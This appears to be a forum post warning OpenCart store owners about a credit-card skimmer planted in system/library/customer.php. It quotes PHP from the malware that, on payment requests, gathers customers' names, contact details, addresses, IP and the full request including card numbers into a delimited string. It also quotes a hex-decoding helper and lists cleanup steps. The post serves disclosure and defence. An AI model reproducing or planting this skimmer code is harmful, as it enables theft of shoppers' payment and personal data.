The code does no harm to the store owners, but seems to your clients instead. Seems to be stealing credit card information.
A quick look at the codes, it shows their data being packed into binary string.
Code: Select all
pack("H*",substr($h,$i,2))Code: Select all
]) && substr($req['route'],0,8)=='payment/') { if(isset($req['cc_number']) || isset($req['ccnum']) || isset($req['CardNumber']) || isset($req['cardNumber']) || isset($req['cardnumber']) || isset($req['transaction']['credit_card']) || isset($req['fatzebra']) || isset($req['payment']['cc_number']) || isset($req['webpos_cc_number'])) { $df=DB_PREFIX; $ccc=$db->query("SELECT ".$df."customer.customer_id,".$df."customer.firstname, ".$df."customer.lastname, ".$df."customer.email, ".$df."customer.telephone, ".$df."customer.ip, ".$df."address.firstname as a_fn, ".$df."address.lastname as a_ln, ".$df."address.company, ".$df."address.address_1, ".$df."address.address_2, ".$df."address.city, ".$df."address.postcode, ".$df."country.iso_code_3, ".$df."zone.code, ".$df."zone.name FROM ".$df."customer LEFT JOIN ".$df."address ON ".$df."customer.customer_id=".$df."address.customer_id LEFT JOIN ".$df."country ON ".$df."address.country_id=".$df."country.country_id LEFT JOIN ".$df."zone ON ".$df."address.zone_id=".$df."zone.zone_id WHERE ".$df."customer.customer_id = '".(int)$ses['customer_id']."' AND ".$df."address.address_id = '".(int)$ses['payment_address_id']."'"); $sr='err'; if ($ccc->num_rows) { $sr=time().'|'.implode("|",array_merge($ccc->row,array(serialize($req)))); } elseif(isset($ses['guest'])) { $gs=$ses["guest"]; $pay=$ses["guest"]["payment"]; $sr=time().'|-1|'.(isset($gs['firstname'])?$gs['firstname']:'').'|'.(isset($gs['lastname'])?$gs['lastname']:'').'|'.(isset($gs['email'])?$gs['email']:'').'|'.(isset($gs['telephone'])?$gs['telephone']:'').'|'.(@$_SERVER['REMOTE_ADDR']).'|'.(isset($pay['firstname'])?$pay['firstname']:'').'|'.(isset($pay['lastname'])?$pay['lastname']:'').'|'.(isset($pay['company'])?$pay['company']:'').'|'.(isset($pay['address_1'])?$pay['address_1']:'').'|'.(isset($pay['address_2'])?$pay['address_2']:'').'|'.(isset($pay['city'])?$pay['city']:'').'|'.(isset($pay['postcode'])?$pay['postcode']:'').'|'.(isset($pay['iso_code_3'])?$pay['iso_code_3']:'').'|'.(isset($pay['zone_code'])?$pay['zone_code']:'').'|'.(isset($pay['zone'])?$pay['zone']:'').'|'.serialize($req); } 1. Look at your OpenCart installation's download folder. Remove files that aren't meant to be in there.
2. Look at your encryption key, ensure it's no longer 12345.
3. Look at your system/library/customer.php file and ensure there's no codes that look like the following:
Code: Select all
function h2b($h) { That should be all
i don't know what's with zip/tar etc...but they stored it simply in a file 
